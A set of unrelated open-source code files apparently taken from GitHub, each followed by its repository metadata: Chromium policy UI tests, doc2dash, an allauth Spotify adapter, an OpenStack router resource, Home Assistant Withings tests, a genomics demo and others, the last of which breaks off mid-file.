continue
if not expected and not include_unexpected:
continue
if not did_test:
did_test = True
policy_dict = {
policy: policy_test[PolicyPrefsTestCases.INDEX_VALUE]
}
self.SetUserPolicy(policy_dict)
self.NavigateToURL(page)
self.assertEqual(expected, self.IsAnyBannerVisible(), msg=
'Banner was%sexpected in %s, but it was%svisible.\n'
'The policy tested was "%s".\n'
'Please check that chrome/test/functional/policy_prefs_ui.py has '
'an entry for any new policies introduced.' %
(expected and ' ' or ' NOT ', page, expected and ' NOT ' or ' ',
policy))
if did_test:
logging.debug('Policy passed: %s' % policy)
def testUserPoliciesShowBanner(self):
"""Verifies the banner is shown when a user pref is managed by policy."""
self.RunUserPoliciesShowBanner(True, False)
# This test is disabled by default because it takes a very long time,
# for little benefit.
def UserPoliciesDontShowBanner(self):
"""Verifies that the banner is NOT shown on unrelated pages."""
self.RunUserPoliciesShowBanner(False, True)
def testFailOnUserPoliciesNotTested(self):
"""Verifies that all existing user policies are covered.
Fails for all user policies listed in GetPolicyDefinitionList() that aren't
listed in |PolicyPrefsUITest.policies|, and thus are not tested by
|testUserPoliciesShowBanner|.
"""
all_policies = self.GetPolicyDefinitionList()
for policy in all_policies:
# Skip device policies
if all_policies[policy][1]:
continue
self.assertTrue(policy in PolicyPrefsTestCases.policies, msg=
'Policy "%s" does not have a test in '
'chrome/test/functional/policy_prefs_ui.py.\n'
'Please edit the file and add an entry for this policy.' % policy)
test_type = type(PolicyPrefsTestCases.policies[policy]
[PolicyPrefsTestCases.INDEX_VALUE]).__name__
expected_type = all_policies[policy][0]
self.assertEqual(expected_type, test_type, msg=
'Policy "%s" has type "%s" but the test value has type "%s".' %
(policy, expected_type, test_type))
def testToggleUserPolicyTogglesBanner(self):
"""Verifies that toggling a user policy toggles the banner's visibility."""
# |policy| just has to be any user policy that has at least a settings page
# that displays the banner when the policy is set.
policy = 'ShowHomeButton'
policy_test = PolicyPrefsTestCases.policies[policy]
page = PolicyPrefsUITest.settings_pages[
policy_test[PolicyPrefsTestCases.INDEX_PAGES][0]]
policy_dict = {
policy: policy_test[PolicyPrefsTestCases.INDEX_VALUE]
}
self.SetUserPolicy({})
self.NavigateToURL(page)
self.assertFalse(self.IsAnyBannerVisible())
self.SetUserPolicy(policy_dict)
self.assertTrue(self.IsAnyBannerVisible())
self.SetUserPolicy({})
self.assertFalse(self.IsAnyBannerVisible())
if __name__ == '__main__':
pyauto_functional.Main()
| {
"content_hash": "5985a27d69ae7c94e65d5e9c19a9a9a6",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 80,
"avg_line_length": 37.525,
"alnum_prop": 0.6655562958027982,
"repo_name": "keishi/chromium",
"id": "12c126a076edf257c74c33edfc2385ca7e909c79",
"size": "6807",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "chrome/test/functional/policy_prefs_ui.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "ASP",
"bytes": "853"
},
{
"name": "Arduino",
"bytes": "464"
},
{
"name": "Assembly",
"bytes": "1172794"
},
{
"name": "C",
"bytes": "67452317"
},
{
"name": "C#",
"bytes": "1132"
},
{
"name": "C++",
"bytes": "132681259"
},
{
"name": "F#",
"bytes": "381"
},
{
"name": "Go",
"bytes": "19048"
},
{
"name": "Java",
"bytes": "361412"
},
{
"name": "JavaScript",
"bytes": "16603687"
},
{
"name": "Objective-C",
"bytes": "9609581"
},
{
"name": "PHP",
"bytes": "97796"
},
{
"name": "Perl",
"bytes": "918683"
},
{
"name": "Python",
"bytes": "6407891"
},
{
"name": "R",
"bytes": "524"
},
{
"name": "Shell",
"bytes": "4192593"
},
{
"name": "Tcl",
"bytes": "277077"
}
],
"symlink_target": ""
} |
from __future__ import annotations
import logging
from doc2dash.parsers.types import Parser
from .docsets import DocSet
from .parsers.patcher import patch_anchors
log = logging.getLogger(__name__)
def convert_docs(
*,
parser: Parser,
docset: DocSet,
quiet: bool,
) -> None:
"""
User *parser* to parse, index, and patch *docset*.
"""
log.info("Parsing documentation...")
with docset.db_conn:
toc = patch_anchors(parser, docset.docs, show_progressbar=not quiet)
next(toc)
for entry in parser.parse():
docset.db_conn.execute(
"INSERT INTO searchIndex VALUES (NULL, ?, ?, ?)",
entry.as_tuple(),
)
toc.send(entry)
count = docset.db_conn.execute(
"SELECT COUNT(1) FROM searchIndex"
).fetchone()[0]
color = "green" if count > 0 else "red"
log.info(f"Added [{color}]{count:,}[/{color}] index entries.")
# Now patch for TOCs.
toc.close()
| {
"content_hash": "04319342e78adf84f859686741746de8",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 76,
"avg_line_length": 23.53488372093023,
"alnum_prop": 0.5849802371541502,
"repo_name": "hynek/doc2dash",
"id": "cd577231141afa1308f224c66d7180efaf7df7ef",
"size": "1012",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "src/doc2dash/convert.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "38597"
},
{
"name": "Python",
"bytes": "69808"
},
{
"name": "Starlark",
"bytes": "2048"
}
],
"symlink_target": ""
} |
import os
import multiprocessing
import shutil
# Provide access to the helper scripts
def modify_path():
scripts_dir = os.path.dirname(__file__)
while not 'Scripts' in os.listdir(scripts_dir):
scripts_dir = os.path.abspath(os.path.join(scripts_dir, '..'))
scripts_dir = os.path.join(scripts_dir, 'Scripts')
if not scripts_dir in os.environ['PATH']:
os.environ['PATH'] += os.pathsep + scripts_dir
print '\nPATH = {}\n'.format(os.environ['PATH'])
# Move new files and folders to 'Refs'
def move(old_snap):
new_snap = os.listdir(os.curdir)
if not os.path.exists('Refs'):
os.mkdir('Refs')
for f in new_snap:
if not f in old_snap:
fname = os.path.basename(f)
new_name = os.path.join(os.curdir, 'Refs', fname)
if os.path.isfile(new_name):
os.remove(new_name)
if os.path.isdir(new_name):
shutil.rmtree(new_name)
os.rename(f, new_name)
if __name__ == '__main__':
# Enable multithreading for ccx
os.environ['OMP_NUM_THREADS'] = str(multiprocessing.cpu_count())
# Explicitly move to example's directory
os.chdir(os.path.dirname(__file__))
# Run the example
modify_path()
snap = os.listdir(os.curdir)
os.system("cgx -b pre.fbd")
os.system("ccx plates")
os.system("cgx -b post.fbd")
move(snap)
| {
"content_hash": "e0d7622c23613d714b5fd41b5f7c8880",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 70,
"avg_line_length": 29.595744680851062,
"alnum_prop": 0.6024442846872753,
"repo_name": "mkraska/CalculiX-Examples",
"id": "ce6ca7e981fc7381479b54bd9a719a1c9aed2b67",
"size": "1409",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Linear/Plates/test.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "6479"
},
{
"name": "GLSL",
"bytes": "3414"
},
{
"name": "Gnuplot",
"bytes": "10112"
},
{
"name": "Makefile",
"bytes": "6802"
},
{
"name": "NASL",
"bytes": "1378"
},
{
"name": "Python",
"bytes": "115410"
}
],
"symlink_target": ""
} |
import requests
from allauth.socialaccount.providers.oauth2.views import (
OAuth2Adapter,
OAuth2CallbackView,
OAuth2LoginView,
)
from .provider import SpotifyOAuth2Provider
class SpotifyOAuth2Adapter(OAuth2Adapter):
provider_id = SpotifyOAuth2Provider.id
access_token_url = "https://accounts.spotify.com/api/token"
authorize_url = "https://accounts.spotify.com/authorize"
profile_url = "https://api.spotify.com/v1/me"
def complete_login(self, request, app, token, **kwargs):
extra_data = requests.get(
self.profile_url, params={"access_token": token.token}
)
return self.get_provider().sociallogin_from_response(request, extra_data.json())
oauth_login = OAuth2LoginView.adapter_view(SpotifyOAuth2Adapter)
oauth_callback = OAuth2CallbackView.adapter_view(SpotifyOAuth2Adapter)
| {
"content_hash": "442bab42eebcaac1d034a7e7f1207169",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 88,
"avg_line_length": 31.555555555555557,
"alnum_prop": 0.7335680751173709,
"repo_name": "rsalmaso/django-allauth",
"id": "83fe5a1b96d72d94927e762b178cdb10f87d74b2",
"size": "852",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "allauth/socialaccount/providers/spotify/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Emacs Lisp",
"bytes": "104"
},
{
"name": "HTML",
"bytes": "20404"
},
{
"name": "JavaScript",
"bytes": "3360"
},
{
"name": "Makefile",
"bytes": "396"
},
{
"name": "Python",
"bytes": "923713"
}
],
"symlink_target": ""
} |
import ipdb
import sys
sys.path.append('./..')
import mtSet.pycore.modules.splitter as SPLIT
import mtSet.pycore.modules.multiTraitSetTest as MTST
import mtSet.pycore.modules.chi2mixture as C2M
from mtSet.pycore.utils.utils import smartAppend
from mtSet.pycore.utils.utils import smartDumpDictHdf5
import scipy as SP
import h5py
import pylab as PL
import copy
import os
import cPickle
import time as TIME
import urllib
# data and cache files
files = {}
files['data_dir'] = 'data'
files['data'] = 'data/arab107_preprocessed.hdf5'
files['data_url'] = 'http://www.ebi.ac.uk/~casale/arab107_preprocessed.hdf5'
files['out_file'] = 'data/results.hdf5'
files['split_cache'] = 'windows_split.hdf5'
files['mtSet_null_cache'] = 'mtSet_null_cache.hdf5'
files['stSet_null_cache'] = 'stSet_null_cache.hdf5'
files['mtSetPC_null_cache'] = 'mtSetPC_null_cache.hdf5'
# settings for splitting the genome in different regions and permutations
settings = {}
settings['window_size'] = 1e4
settings['minNumberSnps'] = 4 # considers only windows with at least 4 SNPs
settings['n_windows'] = 10
settings['n_permutations'] = 10
def download_data():
if not os.path.exists(files['data']):
if not os.path.exists(files['data_dir']):
os.makedirs(files['data_dir'])
print "file not found, downloading from %s" % files['data_url']
testfile=urllib.URLopener()
testfile.retrieve(files['data_url'],files['data'])
if __name__ == "__main__":
# N = number of samples
# P = number of phenotypes
# V = number of variants
# K = number of covariates
download_data()
# import data
f = h5py.File(files['data'],'r')
phenotype = f['phenotype'][:] # phenotype matrix (NxP)
phenotypeID = f['phenotypeID'][:] # phenotype ids (P-vector)
genotype = f['genotype'] # genotype matrix (NxV)
relatedness = f['relatedness'][:] # relatedness matrix (NxN)
geno_pos = f['geno_pos'][:] # genotype positions (V-vector)
geno_chrom = f['geno_chrom'][:] # genotype choromosomes (V-vector)
covariates = f['covariates'][:] # covariate matrix (NxK)
# here we consider no covariates for mtSet and stSet
# while we consider 6 covariates for mtSetPC
# (intercept term and first 5 pcs of the relatedness matrix)
# multi trait set test class
mtSet = MTST.MultiTraitSetTest(phenotype,relatedness)
mtSetPC = MTST.MultiTraitSetTest(phenotype,F=covariates)
print '.. fit null models'
mtSet_null_info = mtSet.fitNull(cache=True,fname=files['mtSet_null_cache'],rewrite=True)
stSet_null_info = mtSet.fitNullTraitByTrait(cache=True,fname=files['stSet_null_cache'],rewrite=True)
mtSet_null_info = mtSetPC.fitNull(cache=True,fname=files['mtSetPC_null_cache'],rewrite=True)
print '.. precompute genotype windows'
split = SPLIT.Splitter(pos=geno_pos,chrom=geno_chrom)
split.splitGeno(size=settings['window_size'],minSnps=settings['minNumberSnps'],cache=True,fname=files['split_cache'])
nWindows = split.get_nWindows()
RV = {}
print '.. set test scan'
for window_idx in range(settings['n_windows']):
print '\t.. window %d'%window_idx
# consider genetic region
Iregion, rv_windows = split.getWindow(window_idx)
region = genotype[:,Iregion]
# fit models
rv_mtSet = mtSet.optimize(region)
rv_stSet = mtSet.optimizeTraitByTrait(region)
rv_mtSetPC = mtSetPC.optimize(region)
# store LLR (log likelihood ratios) and window positions
smartAppend(RV,'window_chromosome',rv_windows['chrom'][0])
smartAppend(RV,'window_start',rv_windows['start'][0])
smartAppend(RV,'window_end',rv_windows['end'][0])
smartAppend(RV,'llr_mtSet',rv_mtSet['LLR'][0])
smartAppend(RV,'llr_stSet',SP.concatenate([rv_stSet[key]['LLR'] for key in rv_stSet.keys()]))
smartAppend(RV,'llr_mtSetPC',rv_mtSetPC['LLR'][0])
# consider permutations
for permutation_i in range(settings['n_permutations']):
print '.. permutation %d' % permutation_i
# set seed and generate sample permutation
SP.random.seed(permutation_i)
permutation = SP.random.permutation(phenotype.shape[0])
for window_idx in range(settings['n_windows']):
print '\t.. window %d'%window_idx
# consider genetic region and permute
Iregion, rv_windows = split.getWindow(window_idx)
region = genotype[:,Iregion]
permuted_region = region[permutation,:]
# fit models
rv_mtSet = mtSet.optimize(permuted_region)
rv_stSet = mtSet.optimizeTraitByTrait(permuted_region)
rv_mtSetPC = mtSetPC.optimize(permuted_region)
# store permutation LLRs
smartAppend(RV,'permutation_llr_mtSet',rv_mtSet['LLR'][0])
smartAppend(RV,'permutation_llr_stSet',SP.concatenate([rv_stSet[key]['LLR'] for key in rv_stSet.keys()]))
smartAppend(RV,'permutation_llr_mtSetPC',rv_mtSetPC['LLR'][0])
# vectorize outputs
for key in RV.keys(): RV[key] = SP.array(RV[key])
ipdb.set_trace()
print '.. calculate p-values'
print '(for accurate estimate of pvalues either the number of windows or the number of permutations should be increased)'
c2m = C2M.Chi2mixture(tol=4e-3)
# obtain p-values for mtSet
c2m.estimate_chi2mixture(RV['permutation_llr_mtSet'])
RV['pv_mtSet'] = c2m.sf(RV['llr_mtSet'])
RV['permutation_pv_mtSet'] = c2m.sf(RV['permutation_llr_mtSet'])
# obtain p-values for stSet
RV['pv_stSet'] = SP.zeros_like(RV['llr_stSet'])
RV['permutation_pv_stSet'] = SP.zeros_like(RV['permutation_llr_stSet'])
for p in range(phenotype.shape[1]):
c2m.estimate_chi2mixture(RV['permutation_llr_stSet'][:,p])
RV['pv_stSet'][:,p] = c2m.sf(RV['llr_stSet'][:,p])
RV['permutation_pv_stSet'][:,p] = c2m.sf(RV['permutation_llr_stSet'][:,p])
# obtain p-values for mtSetPC
c2m.estimate_chi2mixture(RV['permutation_llr_mtSetPC'])
RV['pv_mtSetPC'] = c2m.sf(RV['llr_mtSetPC'])
RV['permutation_pv_mtSetPC'] = c2m.sf(RV['permutation_llr_mtSetPC'])
print '.. export results in %s'%files['out_file']
fout = h5py.File(files['out_file'],'w')
smartDumpDictHdf5(RV,fout)
fout.close()
| {
"content_hash": "59125a7628105c63dac56d3c5f5615bb",
"timestamp": "",
"source": "github",
"line_count": 167,
"max_line_length": 125,
"avg_line_length": 37.946107784431135,
"alnum_prop": 0.6585134921887328,
"repo_name": "PMBio/mtSet",
"id": "bf2f5676a83935ece03dc60fc22e7426ef14c3a4",
"size": "6963",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "notebooks/arab_demo.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "208765"
},
{
"name": "Shell",
"bytes": "2412"
}
],
"symlink_target": ""
} |
from leancloud import Object
from leancloud import Query
from leancloud import LeanCloudError
from flask import Blueprint
from flask import request
from flask import redirect
from flask import url_for
from flask import render_template
class Todo(Object):
pass
todos_view = Blueprint('todos', __name__)
@todos_view.route('')
def show():
try:
todos = Query(Todo).descending('createdAt').find()
except LeanCloudError as e:
if e.code == 101: # Class does not exist on the cloud.
todos = []
else:
raise e
return render_template('todos.html', todos=todos)
@todos_view.route('', methods=['POST'])
def add():
content = request.form['content']
todo = Todo(content=content)
try:
todo.save()
except LeanCloudError as e:
return e.error, 502
return redirect(url_for('todos.show'))
| {
"content_hash": "e233fad3221a26c3034a4834b12be1fb",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 64,
"avg_line_length": 23.7027027027027,
"alnum_prop": 0.6590649942987458,
"repo_name": "leancloud/python-getting-started",
"id": "d68cce2149be2990137144462757b902374ce9fb",
"size": "894",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "views/todos.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "110"
},
{
"name": "HTML",
"bytes": "1164"
},
{
"name": "Python",
"bytes": "5826"
}
],
"symlink_target": ""
} |
from openstack import resource
from openstack import utils
class Router(resource.Resource, resource.TagMixin):
resource_key = 'router'
resources_key = 'routers'
base_path = '/routers'
# capabilities
allow_create = True
allow_fetch = True
allow_commit = True
allow_delete = True
allow_list = True
# NOTE: We don't support query on datetime, list or dict fields
_query_mapping = resource.QueryParameters(
'description', 'flavor_id', 'name', 'status',
is_admin_state_up='admin_state_up',
is_distributed='distributed',
is_ha='ha',
project_id='tenant_id',
**resource.TagMixin._tag_query_parameters
)
# Properties
#: Availability zone hints to use when scheduling the router.
#: *Type: list of availability zone names*
availability_zone_hints = resource.Body('availability_zone_hints',
type=list)
#: Availability zones for the router.
#: *Type: list of availability zone names*
availability_zones = resource.Body('availability_zones', type=list)
#: Timestamp when the router was created.
created_at = resource.Body('created_at')
#: The router description.
description = resource.Body('description')
#: The ``network_id``, for the external gateway. *Type: dict*
external_gateway_info = resource.Body('external_gateway_info', type=dict)
#: The ID of the flavor.
flavor_id = resource.Body('flavor_id')
#: The administrative state of the router, which is up ``True``
#: or down ``False``. *Type: bool*
is_admin_state_up = resource.Body('admin_state_up', type=bool)
#: The distributed state of the router, which is distributed ``True``
#: or not ``False``. *Type: bool*
is_distributed = resource.Body('distributed', type=bool)
#: The highly-available state of the router, which is highly available
#: ``True`` or not ``False``. *Type: bool*
is_ha = resource.Body('ha', type=bool)
#: The router name.
name = resource.Body('name')
#: The ID of the project this router is associated with.
project_id = resource.Body('tenant_id')
#: Revision number of the router. *Type: int*
revision_number = resource.Body('revision', type=int)
#: The extra routes configuration for the router.
routes = resource.Body('routes', type=list)
#: The router status.
status = resource.Body('status')
#: Timestamp when the router was created.
updated_at = resource.Body('updated_at')
def add_interface(self, session, **body):
"""Add an internal interface to a logical router.
:param session: The session to communicate through.
:type session: :class:`~keystoneauth1.adapter.Adapter`
:param dict body: The body requested to be updated on the router
:returns: The body of the response as a dictionary.
"""
url = utils.urljoin(self.base_path, self.id, 'add_router_interface')
resp = session.put(url, json=body)
return resp.json()
def remove_interface(self, session, **body):
"""Remove an internal interface from a logical router.
:param session: The session to communicate through.
:type session: :class:`~keystoneauth1.adapter.Adapter`
:param dict body: The body requested to be updated on the router
:returns: The body of the response as a dictionary.
"""
url = utils.urljoin(self.base_path, self.id, 'remove_router_interface')
resp = session.put(url, json=body)
return resp.json()
def add_gateway(self, session, **body):
"""Add an external gateway to a logical router.
:param session: The session to communicate through.
:type session: :class:`~keystoneauth1.adapter.Adapter`
:param dict body: The body requested to be updated on the router
:returns: The body of the response as a dictionary.
"""
url = utils.urljoin(self.base_path, self.id,
'add_gateway_router')
resp = session.put(url, json=body)
return resp.json()
def remove_gateway(self, session, **body):
"""Remove an external gateway from a logical router.
:param session: The session to communicate through.
:type session: :class:`~keystoneauth1.adapter.Adapter`
:param dict body: The body requested to be updated on the router
:returns: The body of the response as a dictionary.
"""
url = utils.urljoin(self.base_path, self.id,
'remove_gateway_router')
resp = session.put(url, json=body)
return resp.json()
class L3AgentRouter(Router):
resource_key = 'router'
resources_key = 'routers'
base_path = '/agents/%(agent_id)s/l3-routers'
resource_name = 'l3-router'
# capabilities
allow_create = False
allow_retrieve = True
allow_commit = False
allow_delete = False
allow_list = True
# NOTE: No query parameter is supported
| {
"content_hash": "559e4c88eac312f8293e9ba8f1ce104b",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 79,
"avg_line_length": 37.932330827067666,
"alnum_prop": 0.6402378592666006,
"repo_name": "dtroyer/python-openstacksdk",
"id": "afe0f104b8c7e2f6cd54fcc4bdb78c3a6d4bdf80",
"size": "5591",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "openstack/network/v2/router.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3803161"
},
{
"name": "Shell",
"bytes": "9027"
}
],
"symlink_target": ""
} |
from paste.script import templates
class OortAppTemplate(templates.Template):
summary = "A clean Oort web app package"
_template_dir = 'paste_templates/oort_app'
required_templates = ['basic_package']
use_cheetah = False
| {
"content_hash": "225048b4b6b8185b7d271d1801cf4360",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 46,
"avg_line_length": 29.875,
"alnum_prop": 0.7238493723849372,
"repo_name": "tectronics/oort.python-oortpub",
"id": "4f9775f2989525d83fc59babb2678200fe5a70ba",
"size": "239",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "oort/util/paste_templates.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "965"
},
{
"name": "Python",
"bytes": "30204"
}
],
"symlink_target": ""
} |
"""Tests for the Withings component."""
import datetime
import re
from typing import Any
from unittest.mock import MagicMock
from urllib.parse import urlparse
from aiohttp.test_utils import TestClient
import pytest
import requests_mock
from withings_api.common import NotifyAppli, NotifyListProfile, NotifyListResponse
from homeassistant.components.withings.common import (
ConfigEntryWithingsApi,
DataManager,
WebhookConfig,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.config_entry_oauth2_flow import AbstractOAuth2Implementation
from tests.common import MockConfigEntry
from tests.components.withings.common import (
ComponentFactory,
get_data_manager_by_user_id,
new_profile_config,
)
from tests.test_util.aiohttp import AiohttpClientMocker
async def test_config_entry_withings_api(hass: HomeAssistant) -> None:
"""Test ConfigEntryWithingsApi."""
config_entry = MockConfigEntry(
data={"token": {"access_token": "mock_access_token", "expires_at": 1111111}}
)
config_entry.add_to_hass(hass)
implementation_mock = MagicMock(spec=AbstractOAuth2Implementation)
implementation_mock.async_refresh_token.return_value = {
"expires_at": 1111111,
"access_token": "mock_access_token",
}
with requests_mock.mock() as rqmck:
rqmck.get(
re.compile(".*"),
status_code=200,
json={"status": 0, "body": {"message": "success"}},
)
api = ConfigEntryWithingsApi(hass, config_entry, implementation_mock)
response = await hass.async_add_executor_job(
api.request, "test", {"arg1": "val1", "arg2": "val2"}
)
assert response == {"message": "success"}
@pytest.mark.parametrize(
["user_id", "arg_user_id", "arg_appli", "expected_code"],
[
[0, 0, NotifyAppli.WEIGHT.value, 0], # Success
[0, None, 1, 0], # Success, we ignore the user_id.
[0, None, None, 12], # No request body.
[0, "GG", None, 20], # appli not provided.
[0, 0, None, 20], # appli not provided.
[0, 0, 99, 21], # Invalid appli.
[0, 11, NotifyAppli.WEIGHT.value, 0], # Success, we ignore the user_id
],
)
async def test_webhook_post(
hass: HomeAssistant,
component_factory: ComponentFactory,
aiohttp_client,
user_id: int,
arg_user_id: Any,
arg_appli: Any,
expected_code: int,
) -> None:
"""Test webhook callback."""
person0 = new_profile_config("person0", user_id)
await component_factory.configure_component(profile_configs=(person0,))
await component_factory.setup_profile(person0.user_id)
data_manager = get_data_manager_by_user_id(hass, user_id)
client: TestClient = await aiohttp_client(hass.http.app)
post_data = {}
if arg_user_id is not None:
post_data["userid"] = arg_user_id
if arg_appli is not None:
post_data["appli"] = arg_appli
resp = await client.post(
urlparse(data_manager.webhook_config.url).path, data=post_data
)
# Wait for remaining tasks to complete.
await hass.async_block_till_done()
data = await resp.json()
resp.close()
assert data["code"] == expected_code
async def test_webhook_head(
hass: HomeAssistant,
component_factory: ComponentFactory,
aiohttp_client,
) -> None:
"""Test head method on webhook view."""
person0 = new_profile_config("person0", 0)
await component_factory.configure_component(profile_configs=(person0,))
await component_factory.setup_profile(person0.user_id)
data_manager = get_data_manager_by_user_id(hass, person0.user_id)
client: TestClient = await aiohttp_client(hass.http.app)
resp = await client.head(urlparse(data_manager.webhook_config.url).path)
assert resp.status == 200
async def test_webhook_put(
hass: HomeAssistant,
component_factory: ComponentFactory,
aiohttp_client,
) -> None:
"""Test webhook callback."""
person0 = new_profile_config("person0", 0)
await component_factory.configure_component(profile_configs=(person0,))
await component_factory.setup_profile(person0.user_id)
data_manager = get_data_manager_by_user_id(hass, person0.user_id)
client: TestClient = await aiohttp_client(hass.http.app)
resp = await client.put(urlparse(data_manager.webhook_config.url).path)
# Wait for remaining tasks to complete.
await hass.async_block_till_done()
assert resp.status == 200
data = await resp.json()
assert data
assert data["code"] == 2
async def test_data_manager_webhook_subscription(
hass: HomeAssistant,
component_factory: ComponentFactory,
aioclient_mock: AiohttpClientMocker,
) -> None:
"""Test data manager webhook subscriptions."""
person0 = new_profile_config("person0", 0)
await component_factory.configure_component(profile_configs=(person0,))
api: ConfigEntryWithingsApi = MagicMock(spec=ConfigEntryWithingsApi)
data_manager = DataManager(
hass,
"person0",
api,
0,
WebhookConfig(id="1234", url="http://localhost/api/webhook/1234", enabled=True),
)
# pylint: disable=protected-access
data_manager._notify_subscribe_delay = datetime.timedelta(seconds=0)
data_manager._notify_unsubscribe_delay = datetime.timedelta(seconds=0)
api.notify_list.return_value = NotifyListResponse(
profiles=(
NotifyListProfile(
appli=NotifyAppli.BED_IN,
callbackurl="https://not.my.callback/url",
expires=None,
comment=None,
),
NotifyListProfile(
appli=NotifyAppli.BED_IN,
callbackurl=data_manager.webhook_config.url,
expires=None,
comment=None,
),
NotifyListProfile(
appli=NotifyAppli.BED_OUT,
callbackurl=data_manager.webhook_config.url,
expires=None,
comment=None,
),
)
)
aioclient_mock.clear_requests()
aioclient_mock.request(
"HEAD",
data_manager.webhook_config.url,
status=200,
)
# Test subscribing
await data_manager.async_subscribe_webhook()
api.notify_subscribe.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.WEIGHT
)
api.notify_subscribe.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.CIRCULATORY
)
api.notify_subscribe.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.ACTIVITY
)
api.notify_subscribe.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.SLEEP
)
try:
api.notify_subscribe.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.USER
)
assert False
except AssertionError:
pass
try:
api.notify_subscribe.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.BED_IN
)
assert False
except AssertionError:
pass
try:
api.notify_subscribe.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.BED_OUT
)
assert False
except AssertionError:
pass
# Test unsubscribing.
await data_manager.async_unsubscribe_webhook()
api.notify_revoke.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.BED_IN
)
api.notify_revoke.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.BED_OUT
)
| {
"content_hash": "70fc5f32d8839a57671164679a65b828",
"timestamp": "",
"source": "github",
"line_count": 242,
"max_line_length": 88,
"avg_line_length": 31.376033057851238,
"alnum_prop": 0.6520479388910839,
"repo_name": "partofthething/home-assistant",
"id": "a5946ff0533ce3ecf54d99bb00608cff42919ef3",
"size": "7593",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "tests/components/withings/test_common.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1720"
},
{
"name": "Python",
"bytes": "31051838"
},
{
"name": "Shell",
"bytes": "4832"
}
],
"symlink_target": ""
} |
import random
import unittest
import sys
sys.path.append('..')
from common.document import Document
from common.model import Model
from common.vocabulary import Vocabulary
from model_evaluator import ModelEvaluator
class ModelEvaluatorTest(unittest.TestCase):
def setUp(self):
self.model = Model(20)
self.model.load('../testdata/lda_model')
self.vocabulary = Vocabulary()
self.vocabulary.load('../testdata/vocabulary.dat')
self.model_evaluator = ModelEvaluator(self.model, self.vocabulary)
def test_compute_loglikelihood(self):
doc_tokens = ['macbook', 'ipad', # exist in vocabulary and model
'mac os x', 'chrome', # only exist in vocabulary
'nokia', 'null'] # inexistent
document = Document(self.model.num_topics)
rand = random.Random()
rand.seed(0)
document.parse_from_tokens(
doc_tokens, rand, self.vocabulary, self.model)
documents = [document, document]
self.assertEqual(-14.113955684239654,
self.model_evaluator.compute_loglikelihood(documents))
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "fecece4a0954a2c9a5e60804a618918e",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 74,
"avg_line_length": 32.69444444444444,
"alnum_prop": 0.6508071367884452,
"repo_name": "ankazhao/python-sparselda",
"id": "7b918d30a159745232dca7fd07254914d4e5ef99",
"size": "1306",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "training/model_evaluator_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import logging
from gi.repository import Gst
from lib.config import Config
from lib.clock import Clock
from lib.args import Args
class Blinder(object):
# create logging interface
log = logging.getLogger('Blinder')
def __init__(self):
# remember some things
self.acaps = Config.getAudioCaps()
self.vcaps = Config.getVideoCaps()
self.volume = Config.getBlinderVolume()
self.blindersources = Config.getBlinderSources()
self.log.info('Configuring video blinders for %u sources',
len(self.blindersources))
# open bin
self.bin = "" if Args.no_bins else """
bin.(
name=blinders
"""
# list blinders
self.livesources = Config.getLiveSources()
# add blinder pipelines
for livesource in self.livesources:
self.bin += """
compositor
name=compositor-blinder-{livesource}
! queue
max-size-time=3000000000
name=queue-video-{livesource}-blinded
! tee
name=video-{livesource}-blinded
video-{livesource}.
! queue
max-size-time=3000000000
name=queue-video-{livesource}-compositor-blinder-{livesource}
! compositor-blinder-{livesource}.
""".format(livesource=livesource)
for blindersource in self.blindersources:
self.bin += """
video-{blindersource}.
! queue
max-size-time=3000000000
name=queue-video-blinder-{blindersource}-compositor-blinder-{livesource}
! compositor-blinder-{livesource}.
""".format(
blindersource=blindersource,
livesource=livesource
)
# Audiomixer
self.bin += """
audiomixer
name=audiomixer-blinder
! audioamplify
amplification={volume}
! queue
name=queue-audio-mix-blinded
max-size-time=3000000000
! tee
name=audio-mix-blinded
audio-mix.
! queue
max-size-time=3000000000
name=queue-capssetter-blinder
! capssetter
caps={acaps}
! queue
max-size-time=3000000000
name=queue-audiomixer-blinder
! audiomixer-blinder.
""".format(acaps=self.acaps,
volume=Config.getBlinderVolume()
)
# Source from the Blank-Audio-Tee into the Audiomixer
self.bin += """
audio-blinder.
! queue
max-size-time=3000000000
